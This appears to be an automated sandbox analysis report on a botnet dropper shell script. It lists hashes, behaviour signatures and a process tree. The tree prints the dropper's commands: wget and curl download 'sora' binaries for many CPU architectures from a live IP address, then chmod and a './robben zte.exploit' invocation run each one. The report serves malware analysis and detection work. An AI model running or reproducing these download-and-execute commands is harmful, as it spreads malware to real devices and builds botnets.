Analysis
-
max time kernel
29s -
max time network
30s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
-
Size
2KB
-
MD5
5ee0ae1a52cdb3d257932d6b048f6846
-
SHA1
074cd5bc461923829a352d3d3b74ca92b72e030a
-
SHA256
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
-
SHA512
7f917bcdf1f7be589cd8fdd2455740907a4d4941f63b4f4eb548a7ff83a4a1a553aeb5f572a6bbfdd02096c32dc9223b8985f1754494d42ef5e1a16a4a9dd25a
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 723 chmod 839 chmod 851 chmod 814 chmod 780 chmod 796 chmod 845 chmod 833 chmod 734 chmod 740 chmod 746 chmod 752 chmod 765 chmod 827 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 725 robben /tmp/robben 735 robben /tmp/robben 741 robben /tmp/robben 747 robben /tmp/robben 753 robben /tmp/robben 766 robben /tmp/robben 782 robben /tmp/robben 797 robben /tmp/robben 816 robben /tmp/robben 828 robben /tmp/robben 834 robben /tmp/robben 840 robben /tmp/robben 846 robben /tmp/robben 852 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 733 cat 728 wget 731 curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Processes
-
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh1⤵
- Writes file to tmp directory
PID:698 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:702
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:713
-
-
/bin/catcat sora.x862⤵PID:722
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:725
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:731
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:737
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:738
-
-
/bin/catcat sora.x86_642⤵PID:739
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:743
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:744
-
-
/bin/catcat sora.i4682⤵PID:745
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:747
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:749
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:750
-
-
/bin/catcat sora.i6862⤵PID:751
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:753
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:755
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:756
-
-
/bin/catcat sora.mpsl2⤵PID:763
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:766
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:769
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:772
-
-
/bin/catcat sora.arm42⤵PID:779
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:782
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:784
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:788
-
-
/bin/catcat sora.arm52⤵PID:794
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:797
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:799
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:805
-
-
/bin/catcat sora.arm62⤵PID:813
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:818
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:823
-
-
/bin/catcat sora.arm72⤵PID:826
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:828
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:830
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:831
-
-
/bin/catcat sora.ppc2⤵PID:832
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:834
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:836
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:837
-
-
/bin/catcat sora.ppc440fp2⤵PID:838
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:840
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:842
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:843
-
-
/bin/catcat sora.m68k2⤵PID:844
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:846
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:848
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:849
-
-
/bin/catcat sora.sh42⤵PID:850
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:852
-